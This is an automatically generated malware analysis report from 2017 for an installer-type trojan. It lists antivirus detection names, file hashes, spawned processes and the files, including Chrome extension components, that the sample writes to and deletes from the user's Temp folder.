Gen.Trojan.Heur.JP.bEWa4g4RCbi_fb00675568

by malwarelabrobot on August 17th, 2017 in Malware Descriptions.

Gen:Variant.Zusy.243619 (BitDefender), Trojan.MSIL.DOTHETUK.haa (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Gen:Variant.Zusy.243619 (B) (Emsisoft), Artemis!FB0067556893 (McAfee), Trojan.Gen.2 (Symantec), Gen:Variant.Zusy.243619 (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), Gen:Trojan.Heur.JP.bEW@a4g4RCbi (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan, Installer

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: fb0067556893d3d8bc2ead097f084722
SHA1: b1bfa884a8c5c6a07466bdc36c22044054fa80a6
SHA256: 9b67b536cde5ed419070de199805de0b17a71df8f0883a82bf5cc5b8f6b55eb7
SSDeep: 49152:5f8TsxPfvhVJB9gYH7GouMNwpUfsm2h9IrleMEOUp1j2Bf2:5fjoOsmIuRqpU
Size: 2127360 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2017-07-16 04:42:48
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

20002.exe:3588
20002.exe:284
webfriend2.exe:2756
%original file name%.exe:3380
msiql.exe:1660
msiql.exe:3536
rundll32.exe:2532

The Trojan injects its code into the following process(es):

webfriend2.tmp:2704

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 20002.exe:3588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (532 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2DF3.tmp (88249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTSetup.exe (30344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (25824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2DF2.tmp (0 bytes)

The process 20002.exe:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\letian.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\uninstall.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\progress_bar.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htfixfunction.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (532 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\ebay.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\6pm.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh6104.tmp (88249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTSetup.exe (30344 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (25824 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-jp.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\riliclient.xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh6103.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\bg_install.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\20002.exe.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo-64x64.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_ok.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\20002.exe.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\sec_setting.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_cancel.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\constant.js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (0 bytes)
